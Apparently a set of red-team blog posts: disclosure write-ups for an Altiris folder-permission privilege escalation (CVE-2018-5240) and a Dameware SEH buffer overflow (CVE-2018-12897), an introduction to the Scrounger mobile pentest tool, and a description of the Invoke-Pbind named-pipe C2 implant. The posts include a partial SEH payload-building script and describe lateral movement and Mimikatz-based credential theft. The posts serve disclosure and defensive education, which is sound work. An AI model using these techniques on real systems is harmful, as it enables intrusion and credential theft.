CVE-2018-5240: Symantec Management Agent (Altiris) Privilege Escalation

During a recent red team exercise, we discovered a vulnerability in the latest versions of the Symantec Management Agent (Altiris) that allowed us to escalate our privileges.

Overview

When the Altiris agent performs an inventory scan, e.g. a software inventory scan, the SYSTEM level service re-applies the permissions on both the NSI and Outbox folders after the scan is completed.

  • C:\Program Files\Altiris\Inventory\Outbox
  • C:\Program Files\Altiris\Inventory\NSI

The permissions applied grant the ‘Everyone’ group full control over both folders, allowing any standard user to replace either folder with a junction pointing to an alternative location. The ‘Everyone’ permission is then applied through the junction to the target folder, with inheritance enforced on every file and folder within that structure.

This allows a low privilege user to elevate their privileges on any endpoint that has Symantec Management Agent v7.6, v8.0 or v8.1 RU7 installed.

Analysis – Discovery

When performing red team engagements, it is common to come across different types of third party endpoint software installed on a host. This type of software is always of interest, as it could be a point of escalation on the host, or potentially across the environment.

One example of endpoint management software we’ve often seen is Altiris by Symantec. This software is an endpoint management framework that allows an organisation to centrally administer their estate to ensure the latest operating system patches are applied, to deliver software, to make configuration changes based on a user’s role or group, and to perform an inventory asset register across the entire estate.

The version tested by Nettitude was 7.6, as shown throughout this release; however, Symantec confirmed on 12 June 2018 that all versions prior to the patched version are affected by the same issue.

We noticed that folders within the Altiris file structure had the ‘Everyone – Full Control’ permission applied. These folders seemed to contain fairly benign content, such as scan configuration files and XML files, which we believed to be output from the inventory scan or from a recent task. These folder and file permissions were found using a simple PowerShell one-liner which allows an ACL review of any Windows host, using only the tools on that host. An example of this one-liner is as follows:

Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object { try { Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring } catch {} } | Export-Csv C:\temp\acl.csv -NoTypeInformation

(See: https://gist.github.com/benpturner/de818138c9fcf8e1e67368a901d652f4)
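When reviewing the resulting CSV offline, a short script can flag the overly permissive entries. This is a sketch in Python; the file path and column names (pschildname, pspath, accesstostring) match the one-liner above, but the helper itself is ours, not part of any toolkit:

```python
# Sketch: triage the CSV produced by the PowerShell one-liner above for
# ACL entries that grant Everyone full control. Column names match the
# Select-Object call; utf-8-sig tolerates the BOM Export-Csv may emit.
import csv

def find_everyone_full_control(csv_path):
    """Return the paths of entries whose ACL grants Everyone FullControl."""
    hits = []
    with open(csv_path, newline="", encoding="utf-8-sig") as f:
        for row in csv.DictReader(f):
            acl = row.get("accesstostring") or ""
            if "Everyone" in acl and "FullControl" in acl:
                hits.append(row["pspath"])
    return hits
```

Running this against C:\temp\acl.csv quickly surfaces candidates such as the NSI and Outbox folders described above.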

When reviewing the timestamps on these folders, it appeared there was activity within them once a day. After further research into the folders, we concluded that these files were likely modified after a system or software inventory scan. Depending on the organisation’s configuration and appetite for inventory management, this may happen more or less frequently than once per day.

Here’s where the fun begins. Having ‘Everyone – Full Control’ permissions on a folder can be of great interest, but sometimes you can go down a rabbit hole that leads to nowhere, other than access to the files themselves. Nevertheless, we jumped headfirst down that rabbit hole.

It’s worth noting that once we found this behaviour, we went back to a recent vulnerability disclosure against Cylance (an excellent post by Ryan Hanson) to see if this type of attack would be possible here:

Here are the folder permissions that we identified on the ‘NSI’ folder. The permissions on the ‘Outbox’ folder were identical.

We then used James Forshaw’s symboliclink-testing-tools to create a mount point redirecting the folder to another location, and confirmed that files were written through the redirection. It is also possible to use the junction tool from Sysinternals (https://docs.microsoft.com/en-us/sysinternals/); the only problem with the Sysinternals junction tool is that it requires the source folder not to exist, whereas in our case the folder was already there with ‘Everyone’ permissions. An example of this is shown below:

If we were to delete this folder entirely, we would not have the correct permissions to recreate this attack. James Forshaw’s toolkit allows the existing folder to be overwritten rather than starting from scratch, as shown below:

Windows itself can create links with the mklink command (built into cmd.exe), but this requires elevated privileges, which would not have been possible in this situation (the point is that we’re attempting to gain elevated privileges).

To completely understand what process was overwriting these permissions, we uploaded Process Monitor from Sysinternals (https://docs.microsoft.com/en-us/sysinternals/) to see what was going on under the hood. As you can see from the output below, a DACL was being applied to every file and folder by AeXNSAgent.exe.

Analysis – Weaponisation

So how can we weaponise this? There are multiple ways to make this vulnerability exploitable, but the path of least resistance was to override the permissions on the entire root Altiris folder (“C:\Program Files\Altiris\Altiris Agent\”) so that we could modify the service binary running under the SYSTEM account, namely AeXNSAgent.exe.

The following screenshots show the permissions applied to the ‘Altiris Agent’ folder and the AeXNSAgent.exe service binary, before modifying the mount point to overwrite the permissions:

We then created a mount point which points to the ‘Altiris Agent’ folder. It’s worth noting that the source folder must be empty for the redirection to be possible; since we had full permissions over every file, this was trivial to arrange. The mount point was created and verified using James Forshaw’s symboliclink-testing-tools.

We then waited for the next scan to run, which was the following morning; the next screenshot shows the outcome. As expected, the ‘Everyone – Full Control’ permission was applied to the root folder and everything under it, including AeXNSAgent.exe.

Once we had full control over AeXNSAgent.exe, we could replace the service binary and reboot the host to obtain SYSTEM level privileges. It is worth noting that privilege escalation vulnerabilities involving symbolic links are fairly common; James Forshaw alone has found well over twenty, as shown here:

Conclusion

This vulnerability affected all versions of the Altiris Management Agent up to and including v7.6, v8.0 and v8.1 RU7. We strongly recommend you apply all patches immediately.

If you have more ideas about exploiting this or similar vulnerabilities, at run time or in other ways, then please share them with the community and let us know your thoughts.

Disclosure Timeline

  • Vendor contacted – 31 May 2018
  • Vendor assigned Tracking ID – 31 May 2018
  • Vendor confirmed 60 day disclosure – 31 May 2018
  • Vendor acknowledged vulnerability in v7.6, 8.0, 8.1 RU7 – 12 June 2018
  • Vendor confirmed fix for all four releases – 16 July 2018
  • CVE issued by participating CNA – 23 July 2018
  • Vendor publicly disclosed (https://support.symantec.com/en_US/article.SYMSA1456.html) – 25 July 2018
  • Nettitude release further information – 12 September 2018

CVE-2018-12897: Solarwinds Dameware Mini Remote Control Local SEH Buffer Overflow

Dameware Mini Remote Control (MRC) is a remote administration utility allowing remote access to end user devices for a variety of purposes. You can often find it among the plethora of toolkits used by system administrators managing the IT infrastructure in organisations.

Having recently completed my OSCE and looking to use some of the skills I picked up there in the real world, I found a local buffer overflow vulnerability in the latest version (at the time of writing) of Dameware MRC, 12.0.5, which has been assigned CVE-2018-12897. The vulnerability is due to insecure handling of a user input buffer, which ultimately allows Structured Exception Handler (SEH) addresses to be overwritten and execution flow to be hijacked.

Below is a video demonstration of exploitation for proof of concept of this vulnerability.

Solarwinds were contacted about this issue; they acknowledged it and released version 12.1, which reportedly contains a fix for the vulnerability. However, at the time of writing, this version doesn’t appear to be available from the customer portal, so if you are affected by this issue it is recommended that you request it directly from customer support.

Method of Exploitation

One of the windows (AMT Settings) within the GUI has several input fields. The majority of these fields lack appropriate input sanitisation, leading to crashes when a large amount of input (more than 3,000 characters) is entered. However, for the proof of concept, only one of these fields was used: the “Host” field under the SOCKS Proxy Settings.

As a simple test for this vulnerability, a large number of characters can be entered into the field to observe the results. Sometimes it is necessary to fuzz input fields and parameters (an automated process of entering varying amounts of different characters in sequence in an attempt to identify unexpected behaviour), but that was not needed in this instance: simply entering a large number of A’s (over 2,000), or any other character, would cause the application to terminate unexpectedly.

Looking at this process in a debugger, it becomes clear what is happening. The input is being written to the stack and has overflown the SEH addresses. This is quickly visible by looking at the SEH chain in the debugger.

Following this process through, eventually we can see our A’s (0x41) being placed into EIP due to the corrupted SEH chain.

Interestingly though, the A’s aren’t displayed as they were entered; they have been separated by null bytes (0x00). This is because the input buffer is processed as wide characters, with UTF-16 encoding. From here, the next step is to determine how many bytes are required before the overwrite happens and to find a suitable “POP, POP, RET” instruction sequence. The buffer length before the overflow was identified using Metasploit’s helpful pattern_create and pattern_offset utilities, taking care to observe the bytes surrounding the overflow, as the null bytes have to be discounted. As DWRCC.EXE (the main executable) is not rebased on each execution, the instruction sequence found at address 0x00439D7D was chosen. The executable was compiled without common protections, including ASLR, which, had it been present, would have made hardcoding an address infeasible.

The next step is to overwrite the next SEH and SEH addresses with, respectively, the opcodes for a small jump over the handler address and the address of the instruction sequence found above. Once executed, the execution flow should then be directed into the area of memory on the stack under our control. For both the address and the jump, UTF-16 characters were used so as to avoid the null bytes. The payload looks like this at this point (most of the ‘A’s have been cropped for readability).
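The wide-character constraints on that payload can be sketched numerically. The padding length below is illustrative (the real offset came from pattern_offset), but the character choices show the trick: each input character expands to two bytes, so the short jump and the POP, POP, RET address are supplied as characters whose UTF-16LE encodings are exactly the bytes required:

```python
# Sketch of the SEH overwrite layout under UTF-16 expansion. OFFSET is
# illustrative; 0x00439D7D is the POP, POP, RET address from the post.
import struct

OFFSET = 536                # illustrative; found with pattern_offset in practice
PPR = 0x00439D7D            # POP, POP, RET in DWRCC.EXE (module is not rebased)

# Each character becomes two bytes on the stack, so both 4-byte SEH
# fields are built from characters whose encodings are the raw bytes needed.
nseh = "\u06eb" + "A"       # EB 06 41 00 -> short jump over the handler, plus filler
seh = "\u9d7d" + "C"        # 7D 9D 43 00 -> 0x00439D7D little-endian

payload = "A" * OFFSET + nseh + seh
raw = payload.encode("utf-16-le")

assert raw[:2] == b"A\x00"                                  # 'A' expands to 41 00
assert raw[OFFSET * 2:OFFSET * 2 + 4] == b"\xeb\x06A\x00"   # next SEH field
assert struct.unpack("<I", raw[OFFSET * 2 + 4:OFFSET * 2 + 8])[0] == PPR
```

Note how the handler address works out: the code units U+9D7D and U+0043 encode to 7D 9D 43 00, which the CPU reads back as the little-endian DWORD 0x00439D7D, with the troublesome null byte supplied for free by the encoding.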

By placing a breakpoint on the first address of our “POP, POP, RET” instruction set, we can pause execution to step through and check everything is working as intended.

The breakpoint was hit, which is the first hurdle down; now we just need to make sure it returns back and executes the jump instruction.

Great, so the jump was taken and we are now executing in a controllable area of memory. This is good news! The next step is to increase the padding and place some shellcode. Due to the wide characters, the shellcode to be used will need to be UTF-16 compatible. Luckily, the alpha2 encoder in Metasploit can generate UTF-16 compatible shellcode. The one caveat is that it requires a register to hold the address of the beginning of the shellcode when the shellcode executes. To achieve this, an offset would need to be calculated from an address which is consistent across runs, independent of the operating system version.

After taking into account the offset, the calculated value could then be placed into EAX right before the shellcode executes. To do this, a technique known as “venetian shellcode” can be used to execute operations in between the null bytes to get EAX to hold the required address. For this to work, the null bytes must be consumed by other harmless operations. This concept was new to me, so I thought I would give it a go here using the simplest form of venetian shellcode. There are some fantastic write-ups which discuss this technique and its history, including Corelan’s tutorials and FuzzySecurity (you can find links to both at the bottom of this post). Thanks for all your awesome work, guys! After combining everything together, we now have the following:

I won’t go into too much detail about how it all works here but if you are interested, you should be able to get an evaluation copy of the software easily enough to have a go yourself! I’m sure there are many other ways to approach this (probably more elegant ways too!).

Finally, we can copy and paste in the constructed payload both inside and outside of the debugger to see what happens.

Several different mitigations for buffer overflows exist which can be implemented during compilation. In some situations they can be bypassed, but they still offer an added layer of protection that helps prevent, or at least increases the complexity of, exploitation. These are not new and have been around for a good while now; it’s 2018, and yet many applications are still being compiled without these protections.

32 bit vs 64 bit

Due to the differences in the way that exceptions are handled between 32-bit and 64-bit applications, only the 32-bit version appears to be exploitable to run arbitrary code. The 64-bit version can be overflowed which will lead to a crash but there wouldn’t be any benefit in doing this from an attacking perspective.

Windows has some inbuilt protections which, when enabled, can help protect the end user from SEH based buffer overflow attacks. One of these, known as SEHOP (Structured Exception Handler Overwrite Protection), enforces an integrity check of the SEH chain before permitting execution. It does this by appending a symbolic record to the end of the chain and, at the point when an exception is raised, checking that this record is still reachable, thereby verifying the integrity of the chain. If the integrity has been impaired, it will safely terminate the process. SEHOP can be enabled via Group Policy, or via the DisableExceptionChainValidation registry value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel.

An older protection mechanism, known as SAFESEH, can be set via a compilation flag. It works by comparing a table of known safe exception handler addresses with those in the chain before jumping to them. However, this technique has some downsides, one being the requirement to recompile binaries with the flag in order to benefit from its protection.

A personal note

Having recently passed my OSCE exam (which was an amazing experience that I fully recommend), I was looking for something I could use my new-found skill set to practise on. Finding this (while not the most exciting vulnerability) was certainly rewarding and taught me some additional techniques that I may not otherwise have come across. Much of that teaching came from security professionals who have written some insanely useful and easy to follow tutorials, and I want to extend a big personal thank you to all who spend their time writing these tutorials and guides. Two of the guides I used for venetian shellcode can be found below, but the entire set of guides is invaluable for exploit development.

Disclosure Process

  • 15 June 2018 – Reported vulnerability to Solarwinds
  • 25 June 2018 – Update from Solarwinds that development team would be in further contact
  • 05 July 2018 – Contacted Solarwinds again to see if there had been any updates
  • 06 August 2018 – Requested update, vendor acknowledged the vulnerability and reported that remediation work was underway
  • 13 August 2018 – Vendor contacts Nettitude to inform them that version 12.1 has been released, containing a fix for the reported issue
  • 06 September 2018 – Public disclosure

Introducing Scrounger – iOS and Android mobile application penetration testing framework

Scrounger is a modular tool designed to perform the routine tasks required during a mobile application security assessment. It conveniently brings together both major mobile operating systems – Android and iOS – into a single tool that is easy to use, well documented, and easily extensible.

Where it differs

Scrounger consists of a number of modules built on top of a strong core. The rationale is to allow easy extensibility, just like Metasploit. As a result, if you want Scrounger to perform additional checks, you can simply add a new module, which can then be executed either through Scrounger’s interactive console or its command line interface.

Furthermore, it contains both Android and iOS modules, so instead of using multiple tools during a mobile application assessment, Scrounger lets you use a single tool and learn a single set of commands that work for both operating systems.

Scrounger already comes bundled with a number of modules that perform a variety of checks against mobile applications.

Requirements

Scrounger has a few requirements, such as the installation of certain packages on the host and certain iOS binaries.

However, it already packs most of the iOS binaries and offers a module that installs them on the device. The package requirements are also specified on the Scrounger GitHub page.

If the prerequisites for a given module are not satisfied, Scrounger will simply not run that module; all modules whose prerequisites are satisfied will run without any problems.

The other main requirement is a jailbroken (iOS) or rooted (Android) device.

Usage

There are two main ways of using Scrounger: command line or interactive console.

The command line is used mainly when performing all checks or writing automation scripts. The console, on the other hand, is used to run a smaller number of modules or to perform specific actions such as decompiling, recompiling and signing applications, extracting certain files, etc.

Command line options

When using the command line, you can list the available modules and their arguments, list the available devices, run a full analysis (which runs all the modules for a certain type of application – Android or iOS) and run a specific module while passing the required arguments.

Here is an example of running a specific module against an Android application, using Scrounger’s command line.

First, we start by listing the required options for the module that we want to run and then we run it.

Console Examples

The console is the main attraction. It is packed with several powerful options and there is plenty of room for further improvements. The console already offers autocomplete (including file path autocomplete), module search, the ability to re-use results from other modules as arguments, command history between usages and the ability to reverse search the used commands.

Here is an example of the console listing specifically the available modules for iOS.

When modules are listed, a brief description of what each module does is also displayed. For both iOS and Android there are two main types of module: misc and analysis. The misc modules are auxiliary modules that perform various actions against the applications, their files and/or devices. The analysis modules analyse the application files, the application itself or the application-generated files in order to assess whether there are any security flaws.

First, we run the options command to show the required arguments for the specific module (as you would in Metasploit). The options command also shows the global options; if a global option is set and a module has an argument with the same name, its value will be filled in automatically. Once the required arguments are set, we run options again to make sure everything is set properly, then run the module using the run command.

As we can see, Scrounger will generate some output and results from running certain modules. These results can then later be used by other modules.

We can use the show results command to see all stored results returned by the execution of other modules. The print command can be used to show the value stored in a certain result, and also to print values stored in global or module arguments. If a result is of interest to another module, it can be used by setting the required argument to the desired result, prefixed with the result: keyword. When setting these arguments, autocomplete will also look in the saved results table and suggest them. Once everything is set, we can simply run the module.

Device Examples

Several modules will require interaction with either an iOS or Android device. It is quite easy to add a device both in the command line or in console.

In this example, an Android device is added to the console using the add_device command (which also offers autocomplete: it will try to get the connected devices and show them as options). Then, using the set global command, we set the device to device 1. When the misc/list_apps module is then used, since the global option is already set and there is a module argument with the same name, the value for that argument is filled in automatically.

Extensibility

Scrounger can also be easily extended to include custom modules and perform custom checks, depending on the pentester’s preference (and we welcome submissions for inclusion in future releases of Scrounger). When installing Scrounger, all the necessary directories are created for you, including a custom modules directory under ~/.scrounger/modules/custom.
In the following example, a custom module was created under custom/analysis/ios/false_positive, meaning that this false_positive module is run against iOS applications.

Creating your own module

Creating a custom module is quite simple and requires only three steps: create a file under the correct module directory (depending on what your module is looking to do), define the two variables meta and options, and define a run function.

Here is an example.
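As a structural sketch only, the layout below follows the three requirements just described. The real base class and import path come from Scrounger itself (check the documentation), and in a real module Scrounger populates each option as an attribute before run() is called; treat every name here as illustrative:

```python
# Structural sketch of a custom Scrounger analysis module, following the
# three requirements above (file location, the meta and options variables,
# and a run function). The base class is stubbed out here; a real module
# subclasses Scrounger's module base class -- see the Scrounger docs.

class Module(object):  # assumption: stands in for Scrounger's base module class
    meta = {
        "author": "Your Name",
        "description": "Checks for a hypothetical false positive",
    }

    options = [
        {
            "name": "identifier",
            "description": "the application's bundle identifier",
            "required": True,
            "default": None,
        },
    ]

    def run(self):
        # each option is expected to be available as an attribute by the
        # time run() executes; report controls inclusion in the final report
        return {
            "title": "Example finding for {}".format(self.identifier),
            "report": False,
        }
```

The file would live under ~/.scrounger/modules/custom/analysis/ios/, mirroring the false_positive example above.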


The newly created file will be automatically added to the list of available modules the next time scrounger-console is launched. There are a few more elements to consider when creating modules, especially analysis modules. For full details, Scrounger offers comprehensive documentation on all the available modules and a detailed explanation of how to create custom ones: https://github.com/nettitude/scrounger/docs

Real life case scenario

On a typical mobile application assessment, we would try to run as many modules as possible. To facilitate that, there is a full_analysis module in the console, and a -f option on the command line, that runs all modules.

This option/module decompiles the application, runs all the necessary auxiliary modules, then runs all the other available modules. It then creates a JSON file containing the results and details of each module that returned report=True. The command line executable also has an option (-p) that reads such a JSON file and prints all the results and details to the console.
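Post-processing that JSON file is straightforward. The sketch below assumes a simple structure (a list of module results with module, report and details fields); this is an assumption rather than Scrounger's documented schema, so inspect a real full_analysis report before relying on these field names:

```python
# Sketch: filter a full_analysis JSON report down to the modules that
# returned report=True. The schema here (a list of objects with "module",
# "report" and "details" keys) is assumed for illustration only.
import json

def reportable_modules(report_json):
    """Return the names of modules whose results were flagged for the report."""
    results = json.loads(report_json)
    return [r["module"] for r in results if r.get("report")]
```

This mirrors what the command line's -p option does for you: pull the reportable findings out of the JSON and display them.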

Future work, feedback & special thanks

There is a lot in store for Scrounger’s future.

The next features to be implemented are included in the last section of the README in Scrounger’s GitHub: https://github.com/nettitude/scrounger.

Any feedback, ideas or bugs can be submitted over on GitHub.

Additionally, a special thanks to all the existing tools and their developers, as they have contributed to bringing Scrounger to life. Just to mention a few:

Download

GitHub: https://github.com/nettitude/scrounger

Extending C2 Lateral Movement – Invoke-Pbind

Invoke-Pbind is a mini post exploitation framework written in PowerShell, which builds C2 communications over SMB named pipes using a push rather than a pull mechanism. Pbind was initially created to overcome lateral movement problems, specifically in restricted environments where the server VLAN could not directly talk to the user VLAN (as it should be in every environment). The tool was designed to be integrated with any C2 framework or run as a standalone PowerShell script.

Video Demonstration

If you just want to skip to the video tutorial, then you can find that here and at the end of this post.

The Problem: Segregation and Strict Firewalling

This is useful when you have compromised an organisation and have C2 comms over HTTPS, traversing the corporate proxy server out of the network from users’ workstations, but the target dataset that you are looking to obtain is located in a server VLAN, with a firewall restricting both inbound and outbound traffic. In that scenario, firewall rules will typically only allow specific, pre-approved services to traverse. The following diagram illustrates one such situation, where the environment allows limited services from the user VLAN to the server VLAN, but no ports in the reverse direction.

What options exist for C2 comms

The following are some options for C2 comms, and the mitigations that cause each of them to fail.

Method – Mitigation – Result

  • Direct Internet Access – Blocked by firewall outbound – Fail
  • Traverse Through HTTP Proxy – Blocked by firewall outbound – Fail
  • TCP Reverse Shell – Blocked, or likely detected scanning for open ports – Fail
  • TCP Bind Shell – Blocked by firewall inbound, or a service already running on the open ports; no closed ports detected – Fail
  • ICMP – Blocked by firewall outbound – Fail
  • Daisy over SMB in User VLAN – TCP port 445 blocked from servers to workstations – Fail
  • Daisy over HTTP in User VLAN – Same as the standard reverse options above; all relevant ports blocked – Fail
  • DNS – Authoritative DNS is only permitted via the proxy server, so not possible for C2 comms from the server VLAN – Fail

To be clear, at this point the problem isn’t about getting execution, it’s about having reliable C2 comms that afford the user output for all commands executed and to use the implant as a foothold or staging point to further attacks against servers in the restricted environment.

The Solution

“A named pipe is a logical connection, similar to a Transmission Control Protocol (TCP) session, between the client and server that are involved in the CIFS/SMB connection. The name of the pipe serves as the endpoint for the communication, in the same manner as a port number serves as the endpoint for TCP sessions. This is called a named pipe endpoint.” – https://msdn.microsoft.com/en-us/library/cc239733.aspx.

.NET has classes for creating and interacting with named pipes, namely System.IO.Pipes.NamedPipeServerStream and NamedPipeClientStream:

Where TCP port 445 is open into a server environment, we can overlay the SMB protocol and use a named pipe to share data between the workstation and server, providing a method for exchanging data (comms). The following commands form the basis of creating a named pipe with an access rule that allows “everyone” access:

Since the days of abusing IPC$ with anonymous access (CVE-1999-0519), and RID cycling your way to a plethora of goodies, Microsoft have said “no – thou shall not pass” (not a direct Microsoft quote). One quick problem to overcome: while the ‘AccessRule’ applied to the pipe may look like it allows “everyone” access to the named pipe, this is not actually the case. In a domain environment, however, any user can create a domain authenticated session to the IPC$ share, which can then be piggybacked to gain access to the named pipe. Here is a simple script in PowerShell to create an authenticated session.

Interacting with a named pipe is also fairly straightforward, as long as you know the data type of what is being read; as we created the server, we know how to handle the pipe, as shown using a simple StreamReader:

Design

When we came up with Invoke-Pbind, the following design principles were applied.

Client/Server Model

To allow for inclusion in a C2 framework, two script blocks were created: client and server. The server script starts and sets up the named pipe on the remote target (the server). The client then connects to the named pipe and exchanges messages over TCP port 445 (SMB). The client runs through an existing C2 implant and, by using script blocks and runspaces, can run non-interactively, which integrates well with most C2 frameworks.

Token Passing

When sharing a common space such as a named pipe, it is imperative that messages exchanged between the client and server are not overwritten before being picked up by their counterpart. Control messages are used, in combination with TRY and IF statements, to create rules for when a client or server should read from or write to the named pipe.
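Invoke-Pbind implements this in PowerShell over the SMB named pipe; purely as an illustration of the control-message idea, the sketch below (Python, with a one-slot in-memory channel standing in for the pipe) shows how tagged messages stop either side from overwriting an unread message:

```python
# Conceptual sketch of the token-passing scheme: one message in flight at
# a time, tagged so each side only consumes what is addressed to it. This
# illustrates the protocol only, not the SMB named pipe transport.

class PipeSlot:
    """Stands in for the named pipe shared by client and server."""
    def __init__(self):
        self.message = None

    def write(self, tag, body):
        # a TRY/IF-style guard: never overwrite a message that has not
        # yet been picked up by the other side
        if self.message is not None:
            raise RuntimeError("message still pending; wait for the reader")
        self.message = (tag, body)

    def read(self, expected_tag):
        if self.message is None or self.message[0] != expected_tag:
            return None                 # nothing addressed to us yet
        _, body = self.message
        self.message = None             # free the slot for the next writer
        return body

pipe = PipeSlot()
pipe.write("COMMAND", "whoami")                # client issues a command
cmd = pipe.read("COMMAND")                     # server picks it up
pipe.write("OUTPUT", "nt authority\\system")   # server writes the output
out = pipe.read("OUTPUT")                      # client collects the result
```

The real implementation layers encryption and a shared secret (described below in the post) on top of this exchange, but the turn-taking guard is the core of it.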

Security

During the generation of the script blocks, at run time, a unique key is generated and used to encrypt messages between client and server; Pbind supports AES 256 encryption. A shared secret is also required to initiate a connection to the named pipe from a client, to prevent tampering with the pipe. If the client does not provide the correct secret, the named pipe will close.

Injection/Execution

There are two main methods included for injecting the implant into target hosts. These are modified versions of Invoke-WMIExec and Invoke-SMBExec (credit to Kevin Robertson for these scripts); both have been updated to support passing passwords, where previously they only accepted hashes for authentication. The implant is a self-executing script block that is passed as the payload. The script runs WMIExec by default but contains a switch parameter to invoke SMBExec:

To provide additional deployment flexibility, the script also includes an exe method. This method uses csc.exe and the .NET automation DLL to compile the implant into an executable that can then be deployed and executed through any means.

NOTE: Creating a named pipe does not require administrator credentials, so the executable can be run as a non-privileged user; WMIExec and SMBExec, on the other hand, require administrator privileges.

The exe option still generates unique variables that are hardcoded into the executable, for use in cryptography and the like. It can be used offline to create an executable implant and is not tied to an interactive session through a C2. To talk to the implant, the script supports a CLIENT option that is used to interact with a deployed implant; the options for it are provided when the implant is compiled:

This flexibility allows for the deployment through any means:

  • DCOM
  • RDP
  • Shared Folders
  • WinRM
  • SCCM
  • Anything else…

There are a number of options that are configurable. If no options are selected, the script reverts to pre-set or randomly generated values. The following options are configurable:

  • KEY – defaults to a randomly generated AES 256 key; allows a specific key to be provided, commonly used in client mode.
  • SECRET – defaults to a random 5 character value; allows a specific secret to be used.
  • PNAME – defaults to a random 8 character value; allows a specific pipe name to be chosen.
  • TIMEOUT – defaults to 60 seconds; changes how long the client waits to connect to the implant, useful on slow networks.
  • EXE – generates a stand-alone executable.
  • CLIENT – runs the script in client mode to connect to a deployed executable.
  • TARGET – used to specify a remote IP address.
  • Domain/User/Password/Hash – used to provide credentials for authentication.
  • Domain2/User2/Password2 – used to map a drive to the target system when a hash is being used as the primary authentication mechanism.
  • Dir – used in EXE mode; the directory to output the generated executable to.
  • Automation – used in EXE mode; the directory location of the Automation DLL.

Interaction

Three main functions have been created to interact with the implant from a client. The first, and probably the most useful, especially once we introduce templates, is Pbind-Command. This simply registers a command in a variable that is read in by the client and passed to the implant (server) before being executed. A simple example is shown below:

The second is Pbind-Module, which allows you to read in any other ps1 file and have it injected into memory on the implanted host, e.g. Pbind-Module c:\folder\powerup.ps1. Pbind-Command can then be used to execute any of the functions in that script. This has a limitation and does not work well within a C2 setup, because all scripts have to be local to the client; in most cases the client is already running on a target workstation, and every script would have to be uploaded to the client before being sent on to the implant.

Pbind-Squirt was designed to help resolve the limitations of Pbind-Module. The idea was to embed a number of scripts as base64 objects in the script, which could then be called and auto-executed into memory on the client. The only one embedded so far is PowerUp, to assist with asset review on newly implanted hosts.

However, in practice neither Pbind-Module nor Pbind-Squirt proved optimal, and a new solution was adopted instead: ‘templates’. Effectively, this is just a better way to interact with the Pbind-Command function. By creating a number of small scripts that automate tasks, it is possible to achieve the same goals as Pbind-Module and Pbind-Squirt. Tasks such as uploading Mimikatz and extracting passwords, uploading PowerView and running queries, or uploading Invoke-SMBExec and attacking other machines, can all be scripted using a template similar to the one below:

The best way to see how the script runs is to download the script and have a go. The screenshot below shows a simple example of running the script locally under the context of another user, while also executing commands.

Video Tutorial

We have created a video tutorial to help illustrate the use of Invoke-Pbind.

Download

GitHub: https://github.com/nettitude/PoshC2/blob/master/Modules/Invoke-Pbind.ps1